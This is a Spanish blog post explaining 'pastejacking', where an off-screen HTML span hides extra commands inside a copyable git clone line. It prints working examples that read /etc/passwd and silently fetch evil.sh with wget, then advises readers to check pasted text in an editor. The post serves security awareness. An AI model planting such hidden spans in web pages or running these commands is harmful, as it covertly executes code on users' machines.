PasteJacking – Cuando copiar-pegar es un peligro

Falaz es quién afirmará no haber copiado nunca , ningún tipo de información textual en un sitio web , ya sea una serie de líneas de comando , títulos o fragmentos de texto . Y cuidado si tenéis la constumbre de pegarlos directamente en vuestra teminal .

El truco no es nuevo , pero sigue haciendo muchas víctimas , quizás por la desinformación de ciertos usuarios . ¿ Cuantos tutoriales hay en la red , en los cuales nos invitan a copiar y pegar  una serie de comandos con el fin de instalar x programa o solucionar x problema ? Os dejo responder 😀 .

Si pegais la línea de comandos que aparece a continuación , veréis que se ejecutan múchas cosas más .

 git clone /dev/null; clear; echo -n "Hola ";whoami|tr -d '\n';echo -e '!\nCuidado con lo que copias .
Aqui tienes la primera linea del fichero /etc/passwd: ';head -n1 /etc/passwd
 git clone  https://github.com/LionSec/katoolin.git

 

Screenshot from 2016-06-11 14-00-32

Es posible gracias a este fragmento de código .

 <pre> git clone <span style="position: absolute; left: -2000px; top: -100px;">/dev/null; clear; echo -n "Hola ";whoami|tr -d '\n';echo -e '!\nCuidado con lo que copias . <br> Aqui tienes la primera linea del fichero /etc/passwd: ';head -n1 /etc/passwd <br> git clone </span> https://github.com/LionSec/katoolin.git</pre>

Como véis , la parte más importante es el span , que no aparece en pantalla porque fue desplazado de 2000 pixeles a la izquierda . Pero como ha sido insertado entre el principio y el final , al selecionar el comando , también se incluye en el portapapeles de nuestro sistema .

Una vez pegado en la terminal , los comandos no deseados se ejecutarán de forma automática , porque si os habeis fijado , hay saltos de linea (<br>) , equivalentes a la tecla “Enter” , que permite ejecutar los comandos . Además , se añade /dev/null , para evitar el mensaje de error que se produce a ejecutar “git clone” , y descartar todo tipo de sospecha . Para hacerlo más limpio , basta con añadir “&> /dev/null” antes de poner el comando deseado , “y aqui no ha pasado nada ” 😎 .

<pre> git clone <span style="position: absolute; left: -2000px; top: -100px;">/dev/null;wget http://127.0.0.1/evil.sh &> /dev/null <br> git clone </span> https://github.com/LionSec/katoolin.git</pre>

Como véis , es tan secillo y efectivo que hasta los más expertos podrían caer en una trampa de este tipo . Es difícil de combatir porque la mayoría de las medidas de seguridad han sido desarolladas para ataques de pastejacking con javascript , pero como podéis ver en ningún momento he tenido que emplearlo . Por lo tanto , mis recomendaciones son las siguientes :

  • Mantener los ojos abiertos  .
  • Leer el texto copiado en un editor de texto antes de pegarlo en la terminal , para verificar que no hay ningún comando malicioso .

Vídeo

Hasta aqui hemos llegado . si te ha gustado el artículo , no olvides compartirlo .

Un cordial saludo .

 

One thought on “PasteJacking – Cuando copiar-pegar es un peligro

  1. alan

    que pedazo de articulo, no lo habria imaginado, un saludo!

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

You may use these HTML tags and attributes:

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> 

cuatro − dos =

*